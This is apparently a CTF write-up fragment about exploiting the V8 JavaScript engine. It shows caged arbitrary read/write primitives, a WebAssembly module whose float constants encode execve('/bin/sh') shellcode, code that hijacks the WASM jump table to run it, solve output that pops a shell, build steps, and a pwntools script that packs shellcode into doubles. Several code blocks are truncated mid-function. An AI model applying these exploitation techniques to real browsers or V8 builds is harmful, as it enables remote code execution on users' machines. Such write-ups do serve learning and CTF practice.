    let leak = lo(ftoi(c_aar_arr[0]))
    return leak

function caged_arb_read64(addr) {
    let elements = addr - 8n | 1n;
    oob_write32(c_aar_arr_elements_offset, elements)
    let leak = ftoi(c_aar_arr[0])
    return leak

function caged_arb_write32(addr, val) {
    let elements = addr - 8n | 1n;
    let temp = caged_arb_read32(addr+4n)
    oob_write32(c_aaw_arr_elements_offset, elements)
    c_aaw_arr[0] = itof((temp << 32n) | val)

function caged_arb_write64(addr, val) {
    let elements = addr - 8n | 1n;
    oob_write32(c_aaw_arr_elements_offset, elements)
    c_aaw_arr[0] = itof(val)

  (func (export "main") (result f64)
    f64.const 1.617548436999262e-270
    f64.const 1.6181477269733566e-270
    f64.const 1.6305238557700824e-270
    f64.const 1.6477681441619941e-270
    f64.const 1.6456891197542608e-270
    f64.const 1.6304734321072042e-270
    f64.const 1.6305242777505848e-270
  (func (export "pwn"))

var code = new Uint8Array([0, 97, 115, 109, 1, 0, 0, 0, 1, 8, 2, 96, 0, 1, 124, 96, 0, 0, 3, 3, 2, 0, 1, 7, 14, 2, 4, 109, 97, 105, 110, 0, 0, 3, 112, 119, 110, 0, 1, 10, 76, 2, 71, 0, 68, 104, 110, 47, 115, 104, 88, 235, 7, 68, 104, 47, 98, 105, 0, 91, 235, 7, 68, 72, 193, 224, 24, 144, 144, 235, 7, 68, 72, 1, 216, 72, 49, 219, 235, 7, 68, 80, 72, 137, 231, 49, 210, 235, 7, 68, 49, 246, 106, 59, 88, 144, 235, 7, 68, 15, 5, 144, 144, 144, 144, 235, 7, 26, 26, 26, 26, 26, 26, 11, 2, 0, 11]);
var module = new WebAssembly.Module(code);
var instance = new WebAssembly.Instance(module, {});
var wmain = instance.exports.main;
for (let j = 0x0; j < 10000; j++) {

instance_addr = addrof(instance)
jump_table_start = instance_addr + 0x48n
rwx_addr = caged_arb_read64(jump_table_start)
sc_addr = rwx_addr + 0x81an - 0x5n
print("[+] Shellcode @", hex(sc_addr+0x5n))

print("[+] Overwriting WasmInstanceObject jump_table_start to point to our shellcode")
caged_arb_write32(jump_table_start, sc_addr & BigInt(2**32-1))

 // to trigger jmp to address pointed by jump_table_start, we need another new function
var pwn = instance.exports.pwn;
print("[+] Executing shellcode")
$ ./solve.py
[+] Opening connection to localhost on port 5555: Done
[*] Switching to interactive mode
[+] Corrupted oob_arr.length with 32768
[+] Shellcode @ 0x334262b8781a
[+] Overwriting WasmInstanceObject jump_table_start to point to our shellcode
[+] Executing shellcode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ /catflag


Interesting Read


Building d8 for Debugging

git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
export PATH="$(pwd)/depot_tools:$PATH"
fetch v8
cd v8
git checkout 970c2bf28dd
git apply v8.patch
gclient sync
./tools/dev/v8gen.py x64.debug
ninja -C ./out.gn/x64.debug
cd ./out.gn/x64.debug

Python3 Script for Shellcode to Floating Numbers

The script to convert shellcode to floating numbers:

#!/usr/bin/env python3

import struct

from pwn import *

context.arch = "amd64"

# based off shellcraft.amd64.linux.execve(path='/bin/sh')
sc = '''
    push 0x68732f6e
    pop rax
    push 0x69622f
    pop rbx
    shl rax, 24
    add rax, rbx
    xor rbx, rbx
    push rax
    mov rdi, rsp
    xor edx, edx /* 0 */
    xor esi, esi /* 0 */
    push SYS_execve /* 0x3b */
    pop rax

def packshellcode(sc, n):  # packs shellcode into n-byte blocks
    ret = []
    cur = b""
    for line in sc.splitlines():
        k = asm(line)
        assert (len(k) <= n)
        if (len(cur) + len(k) <= n):
            cur += k
            ret += [cur.ljust(6, b"\x90")]  # pad with NOPs
            cur = k

    ret += [cur.ljust(6, b"\x90")]
    return ret

SC = packshellcode(sc, 6)

# Ensure no repeat of 6 byte blocks
D = dict(zip(SC, [SC.count(x) for x in SC]))
assert (max(D.values()) == 1)

# short jmp rel8: https://www.felixcloutier.com/x86/jmp
jmp = b'\xeb'

# add jumps after each 6 byte block
SC = [(x + jmp + b"\x07") for x in SC]

SC = [struct.unpack('<d', x)[0] for x in SC]  # represent as doubles

for i in SC:
    print(f"f64.const {i}")

for i in range(len(SC) - 1):